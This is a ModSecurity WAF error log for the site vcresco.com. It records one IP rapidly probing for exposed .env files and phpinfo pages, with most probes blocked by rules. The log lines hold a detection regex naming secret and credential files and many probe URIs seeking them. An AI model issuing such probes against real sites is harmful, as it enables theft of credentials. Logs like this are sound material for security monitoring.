[Tue May 26 13:03:59.522485 2026] [security2:error] [pid 470766:tid 470908] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ796wAADCQ"]
[Tue May 26 13:03:59.525154 2026] [security2:error] [pid 470766:tid 470908] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ796AAADDA"]
[Tue May 26 13:03:59.574177 2026] [security2:error] [pid 470766:tid 470886] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/BACKEND/.env"] [unique_id "ahVM5-jO_W1DqEcFHQ798QAARXc"]
[Tue May 26 13:03:59.597383 2026] [security2:error] [pid 470766:tid 470883] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/BE/.env"] [unique_id "ahVM5-jO_W1DqEcFHQ798gAAZnQ"]
[Tue May 26 13:03:59.613573 2026] [security2:error] [pid 470766:tid 470841] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/Backend/.env"] [unique_id "ahVM5-jO_W1DqEcFHQ799AAAEEo"]
[Tue May 26 13:03:59.633004 2026] [security2:error] [pid 470766:tid 470855] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/Be/.env"] [unique_id "ahVM5-jO_W1DqEcFHQ799QAAEFg"]
[Tue May 26 13:03:59.643998 2026] [security2:error] [pid 470766:tid 470912] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ798wAAEHM"]
[Tue May 26 13:03:59.673856 2026] [security2:error] [pid 470766:tid 471021] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79-gAAAH0"]
[Tue May 26 13:03:59.678699 2026] [security2:error] [pid 470766:tid 470983] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79_wAAAFc"]
[Tue May 26 13:03:59.700895 2026] [security2:error] [pid 470766:tid 470968] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ7-BgAAAEg"]
[Tue May 26 13:03:59.706297 2026] [security2:error] [pid 470766:tid 470988] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ7-BwAAAFw"]
[Tue May 26 13:03:59.709693 2026] [security2:error] [pid 470766:tid 470953] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ7-DAAAADk"]
[Tue May 26 13:03:59.709731 2026] [security2:error] [pid 470766:tid 470945] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ7-DQAAADE"]
[Tue May 26 13:03:59.710068 2026] [security2:error] [pid 470766:tid 470931] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ7-CAAAACM"]
[Tue May 26 13:03:59.715222 2026] [security2:error] [pid 470766:tid 470950] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ7-FgAAADY"]
[Tue May 26 13:03:59.717100 2026] [security2:error] [pid 470766:tid 471006] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ7-FQAAAG4"]
[Tue May 26 13:03:59.717214 2026] [security2:error] [pid 470766:tid 470960] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ7-FwAAAEA"]
[Tue May 26 13:03:59.721395 2026] [security2:error] [pid 470766:tid 470905] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ7-EwAAAAk"]
[Tue May 26 13:03:59.759773 2026] [security2:error] [pid 470766:tid 470907] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ7-HgAAAAs"]
[Tue May 26 13:03:59.781116 2026] [security2:error] [pid 470766:tid 470973] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ7-JAAAAE0"]
[Tue May 26 13:03:59.814367 2026] [security2:error] [pid 470766:tid 470923] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ7-KAAAABs"]
[Tue May 26 13:03:59.829644 2026] [security2:error] [pid 470766:tid 470919] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ7-KgAAABc"]
[Tue May 26 13:03:59.835955 2026] [security2:error] [pid 470766:tid 471020] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ7-LQAAAHw"]
[Tue May 26 13:03:59.860774 2026] [security2:error] [pid 470766:tid 471003] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ7-MQAAAGs"]
[Tue May 26 13:03:59.862747 2026] [security2:error] [pid 470766:tid 470877] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/_profiler/phpinfo.php"] [unique_id "ahVM5-jO_W1DqEcFHQ7-OQAAEG4"]
[Tue May 26 13:03:59.871347 2026] [security2:error] [pid 470766:tid 471008] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ7-MwAAAHA"]
[Tue May 26 13:03:59.895336 2026] [security2:error] [pid 470766:tid 470912] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ7-PAAAEFU"]
[Tue May 26 13:03:59.897444 2026] [security2:error] [pid 470766:tid 470957] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ7-NwAAAD0"]
[Tue May 26 13:03:59.901033 2026] [security2:error] [pid 470766:tid 470912] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ7-OwAAEGE"]
[Tue May 26 13:03:59.909786 2026] [security2:error] [pid 470766:tid 470954] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ7-RQAAADo"]
[Tue May 26 13:03:59.909942 2026] [security2:error] [pid 470766:tid 470927] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ7-RAAAAB8"]
[Tue May 26 13:03:59.914684 2026] [security2:error] [pid 470766:tid 470912] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ7-PgAAEHo"]
[Tue May 26 13:03:59.915498 2026] [security2:error] [pid 470766:tid 470908] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ7-QwAAAAw"]
[Tue May 26 13:03:59.926874 2026] [security2:error] [pid 470766:tid 470913] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ7-SAAAABE"]
[Tue May 26 13:03:59.955718 2026] [security2:error] [pid 470766:tid 470959] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ7-TgAAAD8"]
[Tue May 26 13:03:59.971578 2026] [security2:error] [pid 470766:tid 471012] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ7-UQAAAHQ"]
[Tue May 26 13:04:00.000019 2026] [security2:error] [pid 470766:tid 470982] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ7-VAAAAFY"]
[Tue May 26 13:04:00.007957 2026] [security2:error] [pid 470766:tid 470851] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/admin-app/.env"] [unique_id "ahVM6OjO_W1DqEcFHQ7-XAAAEFQ"]
[Tue May 26 13:04:00.016128 2026] [security2:error] [pid 470766:tid 470986] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ7-WAAAAFo"]
[Tue May 26 13:04:00.024746 2026] [security2:error] [pid 470766:tid 470931] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ7-WgAAACM"]
[Tue May 26 13:04:00.052065 2026] [security2:error] [pid 470766:tid 470946] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-YAAAADI"]
[Tue May 26 13:04:00.074359 2026] [security2:error] [pid 470766:tid 471018] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-YQAAAHo"]
[Tue May 26 13:04:00.090245 2026] [security2:error] [pid 470766:tid 470912] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-aAAAEA0"]
[Tue May 26 13:04:00.101816 2026] [security2:error] [pid 470766:tid 470792] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/admin/phpinfo.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-cwAAEBk"]
[Tue May 26 13:04:00.165019 2026] [security2:error] [pid 470766:tid 470798] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/admin_phpinfo.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-dgAAEB8"]
[Tue May 26 13:04:00.200950 2026] [security2:error] [pid 470766:tid 470799] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/api-backend/.env"] [unique_id "ahVM6OjO_W1DqEcFHQ7-eQAAECA"]
[Tue May 26 13:04:00.227088 2026] [security2:error] [pid 470766:tid 470874] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/api-node/.env"] [unique_id "ahVM6OjO_W1DqEcFHQ7-ewAAEGs"]
[Tue May 26 13:04:00.246900 2026] [security2:error] [pid 470766:tid 470817] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/api/.env"] [unique_id "ahVM6OjO_W1DqEcFHQ7-fwAAEDI"]
[Tue May 26 13:04:00.274239 2026] [security2:error] [pid 470766:tid 470912] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-bAAAEBg"]
[Tue May 26 13:04:00.278228 2026] [security2:error] [pid 470766:tid 471006] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-aQAAAG4"]
[Tue May 26 13:04:00.278252 2026] [security2:error] [pid 470766:tid 470912] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-ZwAAEGw"]
[Tue May 26 13:04:00.280897 2026] [security2:error] [pid 470766:tid 470912] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-ZAAAEBc"]
[Tue May 26 13:04:00.282664 2026] [security2:error] [pid 470766:tid 470920] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-agAAABg"]
[Tue May 26 13:04:00.304414 2026] [security2:error] [pid 470766:tid 470912] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-dQAAEBI"]
[Tue May 26 13:04:00.312535 2026] [security2:error] [pid 470766:tid 470912] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-dAAAEA4"]
[Tue May 26 13:04:00.314949 2026] [security2:error] [pid 470766:tid 470941] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-fgAAAC0"]
[Tue May 26 13:04:00.319748 2026] [security2:error] [pid 470766:tid 470912] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-eAAAEHg"]
[Tue May 26 13:04:00.320142 2026] [security2:error] [pid 470766:tid 470912] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-bwAAEFI"]
[Tue May 26 13:04:00.326872 2026] [security2:error] [pid 470766:tid 470994] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-cQAAAGI"]
[Tue May 26 13:04:00.358503 2026] [security2:error] [pid 470766:tid 470974] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-iwAAAE4"]
[Tue May 26 13:04:00.379219 2026] [security2:error] [pid 470766:tid 470912] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-jAAAEBw"]
[Tue May 26 13:04:00.410188 2026] [security2:error] [pid 470766:tid 470912] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-jQAAECE"]
[Tue May 26 13:04:00.422057 2026] [security2:error] [pid 470766:tid 470912] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-jgAAECs"]
[Tue May 26 13:04:00.456955 2026] [security2:error] [pid 470766:tid 470831] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/api/info.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-nAAAEEA"]
[Tue May 26 13:04:00.457339 2026] [security2:error] [pid 470766:tid 470912] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-kAAAECY"]
